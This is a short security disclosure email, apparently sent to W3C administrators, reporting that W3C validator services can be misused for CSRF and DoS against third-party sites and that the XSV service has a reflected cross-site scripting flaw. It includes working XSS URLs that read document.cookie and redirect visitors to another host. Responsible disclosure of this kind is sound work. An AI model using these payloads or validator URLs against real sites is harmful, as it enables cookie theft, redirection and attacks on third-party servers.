Hello administrator of www.w3.org!
I want to warn you about security vulnerabilities at your site.
These are Abuse of Functionality, Insufficient Anti-automation and
Cross-Site Scripting vulnerabilities.
Abuse of Functionality:
This functionality can be used for conducting of CSRF attacks on other
sites.
http://validator.w3.org/feed/check.cgi?url=http://google.com
http://www.w3.org/2001/03/webdata/xsv?docAddrs=http://google.com&style=xsl
http://validator.w3.org/check?uri=http://google.com
http://jigsaw.w3.org/css-validator/validator?uri=http://google.com
http://validator.w3.org/checklink?uri=http://google.com
Note, that service W3C Link Checker can be used for scanning of whole
site and so it consumes more resources, as of W3C's server, as of site
which is scanning. It can be used for conducting of DoS attacks on
mentioned servers. About such attacks I mentioned in article DoS
attacks via Abuse of Functionality vulnerabilities (http://websecurity.com.ua/2981/
).
http://qa-dev.w3.org/unicorn/check?ucn_uri=google.com&ucn_task=conformance
http://www.w3.org/RDF/Validator/ARPServlet?URI=http://google.com
Insufficient Anti-automation:
At these pages there is no protection from automated requests
(captcha). Which allows to automate process of conducting of CSRF
attacks at other sites.
XSS (IE):
http://www.w3.org/2001/03/webdata/xsv?docAddrs=%3Cscript%3Ealert(document.cookie)%3C/script%3E&style=xsl
http://www.w3.org/2001/03/webdata/xsv?docAddrs=%3Cscript%3Edocument.location%3D%22http://websecurity.com.ua%22%3C/script%3E&style=xsl
Works only in Internet Explorer.
Attend to security of all of yours web sites, web software and to
security audit.
I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/4320/
).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
